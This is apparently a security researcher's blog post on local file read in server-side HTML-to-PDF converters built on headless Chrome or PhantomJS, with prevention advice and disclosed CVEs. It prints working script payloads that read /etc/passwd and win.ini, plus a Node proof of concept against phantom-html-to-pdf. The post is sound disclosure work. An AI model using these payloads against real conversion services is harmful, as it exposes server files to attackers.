Headless Chrome and File Protocol Scheme Security

Anand Namana
3 min readNov 9, 2020

Introduction

With the rise of headless Chrome and a perfect orchestrator for headless chrome, Puppeteer, the community is rapidly switching to it. Many software libraries and online vendors are switching to headless Chrome(NodeJS) to provide file format conversion services such as HTML to PDF or HTML to Image etc.

Headless Chrome (or headless family of browsers)

Since the HTML files are rendered and converted to PDF files using Puppeteer, it is trivial that the JavaScript in the HTML file is rendered before being printed to PDF. Accepting the HTTP URL’s (e.g. https://www.example.com)as input during this conversion process does not pose any threat to online conversion tools. However, there are threats when the input file is consumed as HTML string or HTML file upload from end users.

Security Issue

Developers often tend to accept HTML files as input and handle the HTML file using the readFile or readFileSync NodeJS functions using the URL object and pass these untrusted files to page.goto() Puppeteer function. The goto function accepts both http or file protocol for navigation. These untrusted files if loaded using the file protocol scheme ‘file:///’ allows the attacker to load arbitrary files present on the server using <iframe> or by setting the window.location, document.location or self.location object property. One can quickly verify the location of object using the below JS snippet during the HTML to PDF conversion process

<script>document.write(window.location)</script>

If the output PDF document was found to be enabled with ‘file:///’ protocol scheme, then there is a likely chance of loading the arbitrary files present on the server. Now a malicious user can load other files present on the server using below malicious snippet

<script>document.write(window.location=’/etc/passwd’)</script>

or by loading the ‘iframe src with file:///etc/passwd’.

Demonstration

Below library is being used to convert the HTML file to PDF using phantom-html-to-pdf Node library. However, malicious payload with in the HTML can be used to print the local file instead of HTML itself

var fs = require(‘fs’)
var conversion = require(“phantom-html-to-pdf”)();
conversion.allowLocalFilesAccess = false
conversion({ html: “<script>document.write(window.location=’c:/windows/win.ini’)</script>” }, function(err, pdf) {
var output = fs.createWriteStream(‘PDF-Out.pdf’)
console.log(pdf.logs);
console.log(pdf.numberOfPages);
pdf.stream.pipe(output);
});

Example is using Phantom html to pdf converter on Windows. This is based on PhantomJS

Prevention

Due to high level of abstraction, it is important for the developers to know the things happening under the hood while using headless chrome and puppeteer. The headless chrome (or chrome) is by design expected to load the local files when using the ‘file:///’ protocol scheme. Using the same feature on server side using headless chrome makes this design vulnerable. Developers can use either page.setContent() (This has some limitations with CSS) Puppeteer function and pass the stream of file using readFile or readFileSync, or the developers can also leverage the data:text/html,htmlcontent (Not the best way, has limits) technique to render the HTML files uploaded by end user. It is important for the developers to avoid using file protocol scheme while using headless chrome on the server.

Vulnerabilities observed:

$150 Reward — ‘cloudconvert.com’ Online website converting HTML to PDF, Issue reported and fixed

CVE-2020–7763https://snyk.io/vuln/npm:phantom-html-to-pdf — Issue reported and fixed

CVE-2020–7762https://snyk.io/vuln/SNYK-JS-JSREPORTCHROMEPDF-1037310 — Issue reported and fixed

Pending fix for one more library (WIP)

3 More online services, found vulnerable and not fixed yet!!

--

--